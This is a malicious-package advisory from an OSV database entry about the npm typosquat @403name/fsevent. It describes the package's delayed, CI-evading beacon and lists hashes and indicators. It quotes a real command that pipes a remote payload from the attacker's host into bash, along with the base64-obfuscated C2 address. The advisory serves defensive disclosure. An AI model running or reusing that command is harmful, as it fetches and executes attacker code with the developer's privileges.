MAL-2026-5549

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/fsevent/MAL-2026-5549.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5549
Published
2026-06-11T03:14:59Z
Modified
2026-06-11T04:01:30.697727988Z
Summary
Malicious code in @403name/fsevent (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (2f86ca4502cc824c3684e8f1e08b088b974b4339829461b50d45e3fbc6f808eb)

On require(), index.js runs an IIFE that gates to macOS, skips when CI or GITHUBACTIONS is set, waits 30-90 seconds, and writes a one-shot marker at ~/.cache/.nyx-npm/f. It then spawns /bin/sh to (1) GET https://k7xm9q.xyz/api/clickfix-callback with URL-encoded query parameters bid, user (process.env.USER), host (os.hostname()), and the literal tag npmfsevent — a beacon identifying the infected machine — and (2) execute curl -sSfL https://k7xm9q.xyz/api/payload/ | /bin/bash & disown, fetching and shell-executing attacker-controlled code with the developer's privileges. The C2 host is hidden behind atob('aHR0cHM6Ly9rN3htOXEueHl6') to evade keyword scanning. The package name @403name/fsevent and its description ("Native filesystem event watcher for Node.js — lightweight FSEvents wrapper with fallback polling") impersonate the well-known fsevents package to lure developers into installing and importing it. The combination of obfuscated C2, CI evasion, randomized delay, one-shot persistence marker, host-identifier exfiltration, and pipe-to-bash remote execution is unambiguous malicious tradecraft.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.0.1"
            ],
            "id": "IN-MAL-2026-005448",
            "import_time": "2026-06-11T03:48:52.63582822Z",
            "modified_time": "2026-06-11T03:14:59Z",
            "sha256": "2f86ca4502cc824c3684e8f1e08b088b974b4339829461b50d45e3fbc6f808eb",
            "source": "amazon-inspector"
        },
        {
            "sha256": "a29e56279c83c00ea2d5d9347dc9741954a596deefd3319185d318593a5c7239",
            "id": "IN-MAL-2026-005451",
            "import_time": "2026-06-11T03:48:53.000305456Z",
            "modified_time": "2026-06-11T03:15:19Z",
            "versions": [
                "1.0.0"
            ],
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / @403name/fsevent

Package

Name
@403name/fsevent
View open source insights on deps.dev
Purl
pkg:npm/%40403name%2Ffsevent

Affected ranges

Affected versions

1.*
1.0.0
1.0.1

Database specific

indicators
{
    "evidence_files": [
        {
            "tlsh": "919163d85af73160566362bd4b2fa909317fc1b3090cee94b55d9ac92f50f14039aef8",
            "sha256": "0edb1fe1a1b96ac8315d1aad997dcbcf49b852a91fe76bddc2cc24e18f1338f3",
            "path": "index.js"
        },
        {
            "sha256": "092e258a50b32f3fcc77288c5a066d6b4dd78580ed470c6936d05780f43299f9",
            "tlsh": "9c014932c5256c630ecca6995f6a12837231589b5806bc0477d75c2ccb8d66b12ff1ed",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "fsevent-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-vvAcdLAAwsshqAuilhO/8JCiYcj4kVqa+UYT3xMhQe3wlewHV7rQZPP2E2h4MgWn/xpVu/D0aqvaI9pFIQbtlQ==",
                "sha1": "28fea122481bb1c8a6a18538d100d11088fe2c50"
            }
        }
    ]
}
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/fsevent/MAL-2026-5549.json"